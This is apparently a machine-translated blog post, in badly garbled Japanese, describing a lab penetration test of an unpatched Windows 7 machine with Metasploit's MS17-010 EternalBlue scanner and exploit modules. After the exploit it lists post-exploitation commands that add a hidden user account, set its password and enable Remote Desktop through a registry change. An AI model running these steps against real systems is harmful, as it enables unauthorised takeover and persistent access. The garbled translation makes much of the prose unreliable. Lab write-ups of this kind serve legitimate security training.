2019年9月27日:侵入テスト、Metasploitのフレームワークの早期暴露

Metasploitのフレームワークを利用する最初の使用、侵入はwin7のを取得するための許可を得ます

ターゲットシステム:Windows7の、無修正

ターゲットIPアドレス:192.168.20.131

タスク:ターゲット・システムの制御を得るためにms17-010、永遠ブルー抜け穴を使用

1は、Metasploitのを使用する前に、PostgreSQLは、サービスを開くために開始PostgreSQLのコマンドサービスを入力し、データベースを開く必要があります

 

2、Metasploitのを起動し、コマンドmsfconsoleを入力するシステムがmsf5が完了スタートです表示

 

 

図3に示すように、最初のプラグイン・ディレクトリを使用して決定され、コマンドの検索ms17-010を入力し、ディレクトリスキャンウィジェットを使用することを決定

 

私たちは見ることができ、

補助/スキャナ/ SMB / smb_ms17_010、これはスキャンは、脆弱性のスクリプトディレクトリがあるかどうかを判断ms17-010です

エクスプロイト/窓/ SMB / ms17_010_eternalblue、このエクスプロイトスクリプトディレクトリであります

ディレクトリが公式の使用を開始することがOKである後4、入力使用し  、補助/スキャナ/ SMB / smb_ms17_010をディレクトリスキャンを入力してください

 

5は、ディレクトリのスキャンを入力した後、オプションを表示することができ、設定するスキャンパラメータを表示

 

6は、192.168.20.131のrhostsを設定、コマンドを入力し、パラメータを設定し、決定するためにホストをスキャン

 

図7に示すように、ターゲットホストの存在を利用することができるかを決定するために、悪用入力

 

 ぶっきらぼう8、決定するために使用することができるので、それは、ハァッ、入力の使用は  / Windowsの/ SMB / ms17_010_eternalblueを悪用し、次のスクリプトms17-010エクスプロイトを入力して、のrhosts 192.168.20.131を設定し、攻撃ホストを設定します

 

9、成功裏に獲得した攻撃、およびシステム権限への直接アクセスを開始し、利用する実行

 

 

 

10、シェルを獲得した後、もちろん何でも行うことができ、

ネットユーザーの$ユーザ名/追加、隠されたユーザーを追加

ネットユーザーの$のユーザー名とパスワード、ユーザーのパスワードを非表示に設定

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,开启3389端口

11、要約

Metasploitのフレームワークは、大幅にテスターの時間を節約し、一般的なテストを使用して簡単にスクリプトを利用するの多くを提供するネットワーク侵入テストツールを作るために実際に必要である、侵入テスターが堪能確認するために優れています

完成

 

おすすめ

転載: www.cnblogs.com/sym945/p/11599845.html